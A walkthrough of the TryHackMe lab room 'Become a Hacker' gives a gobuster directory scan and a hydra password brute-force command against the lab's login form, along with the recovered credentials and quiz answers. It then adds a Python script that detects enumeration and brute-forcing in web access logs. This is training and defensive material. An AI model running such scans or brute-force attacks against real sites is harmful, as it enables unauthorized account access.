Overview
This is a walkthrough of the TryHackMe room "Become a Hacker".
Task 1
Q1. Which of the following options better represents the process where you simulate a hacker's actions to find vulnerabilities in a system? (Offensive Security, Defensive Security)
A. Offensive Security
Task 2
Q1. What is the name of the hidden web page you discovered?
Hint. You should be able to find it in this list: sitemap, cgi-bin, login, register, and admin.
Run a directory scan with gobuster.
gobuster dir --url http://www.onlineshop.thm/ -w /usr/share/wordlists/dirbuster/directory-list.txt
/images (Status: 301) [Size: 313] [-->http://www.onlineshop.thm/images/]
/css (Status: 301) [Size: 310] [-->http://www.onlineshop.thm/css/]
/js (Status: 301) [Size: 309] [-->http://www.onlineshop.thm/js/]
/login (Status: 301) [Size: 314] [-->http://www.onlineshop.thm/login/]
The scan finds the /login page.
A. login
Task 3
Q1. What is the secret message that you have discovered?
Hint. Log in with the username admin and the password you discovered.
Run a brute-force attack against the login form with hydra.
hydra -l admin -P passlist.txt www.onlineshop.thm http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
[80][http-post-form] host: www.onlineshop.thm login: admin password: qwerty
This reveals the credentials Username: admin, Password: qwerty, so log in with them.
A. born_to_be_a_hacker
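Both the gobuster scan in Task 2 and the hydra run in Task 3 leave a very recognisable footprint in the web server's access log, which is what a defender watching that shop would key on. The following script is an added example written for this walkthrough; it is not part of the TryHackMe room and not the room author's code. It parses combined-format (Apache/nginx) access log lines and flags, per client IP, a burst of 404s to many distinct paths (wordlist enumeration) and a burst of POSTs to the login path (password guessing). The log lines are constructed, and the thresholds (10 events in a 60-second window), the login path /login and the user-agent strings are assumptions chosen for illustration.

```python
"""Spot directory enumeration and login brute-forcing in web access logs.

Added example, not from the TryHackMe room or the walkthrough author.
Window size, thresholds, login path and the sample log lines are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" format: ip ident user [ts] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one combined-format line into a dict; return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TIME_FMT)
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def detect(lines, window_s=60, max_404_paths=10, max_login_posts=10, login_path="/login"):
    """Return (ip, kind, count) alerts; at most one alert per ip and kind.

    kind is "dir_enum" when a client hit max_404_paths distinct non-existent paths
    inside one window, and "login_bruteforce" when it POSTed to login_path at
    least max_login_posts times inside one window.
    """
    by_ip = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        by_ip[rec["ip"]].append(rec)

    alerts = []
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        seen = set()
        start = 0
        for end, cur in enumerate(recs):
            # advance the window start so the window spans at most window_s seconds
            while cur["ts"] - recs[start]["ts"] > timedelta(seconds=window_s):
                start += 1
            window = recs[start:end + 1]
            not_found = {r["path"] for r in window if r["status"] == 404}
            posts = sum(1 for r in window
                        if r["method"] == "POST" and r["path"] == login_path)
            if len(not_found) >= max_404_paths and "dir_enum" not in seen:
                seen.add("dir_enum")
                alerts.append((ip, "dir_enum", len(not_found)))
            if posts >= max_login_posts and "login_bruteforce" not in seen:
                seen.add("login_bruteforce")
                alerts.append((ip, "login_bruteforce", posts))
    return alerts


def build_sample_log():
    """Constructed log lines (not real traffic): one scanning client, one ordinary visitor."""
    t0 = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone.utc)

    def line(ip, offset, method, path, status, ua):
        ts = (t0 + timedelta(seconds=offset)).strftime(TIME_FMT)
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 312 "-" "{ua}"'

    scanner, visitor = "10.0.0.5", "10.0.0.9"
    lines = []
    # wordlist sweep: 12 distinct paths in about six seconds, all 404, then the /login hit
    for i, name in enumerate(["sitemap", "cgi-bin", "register", "admin", "backup", "old",
                              "test", "dev", "api", "config", "tmp", "uploads"]):
        lines.append(line(scanner, i * 0.5, "GET", f"/{name}", 404, "gobuster/3.6"))
    lines.append(line(scanner, 7, "GET", "/login", 301, "gobuster/3.6"))
    # password guessing: 12 failed POSTs (the form answers 200 with "incorrect"), then a 302
    for i in range(12):
        lines.append(line(scanner, 20 + i * 0.25, "POST", "/login", 200, "Mozilla/5.0 (Hydra)"))
    lines.append(line(scanner, 24, "POST", "/login", 302, "Mozilla/5.0 (Hydra)"))
    # ordinary visitor: a few real pages and a single mistyped URL
    for i, p in enumerate(["/", "/css/style.css", "/images/logo.png", "/prodcuts", "/products"]):
        lines.append(line(visitor, i * 3, "GET", p, 404 if p == "/prodcuts" else 200, "Mozilla/5.0"))
    return lines


if __name__ == "__main__":
    for ip, kind, count in detect(build_sample_log()):
        print(f"ALERT {kind:16s} client={ip} events_in_window={count}")
```

Counting distinct 404 paths rather than raw 404s keeps a single broken link that is reloaded many times from tripping the enumeration rule, and the visitor's one typo stays well under the threshold. The user-agent strings are deliberately not used as a signal, since both tools let the operator change them; request rate and status pattern are harder to hide.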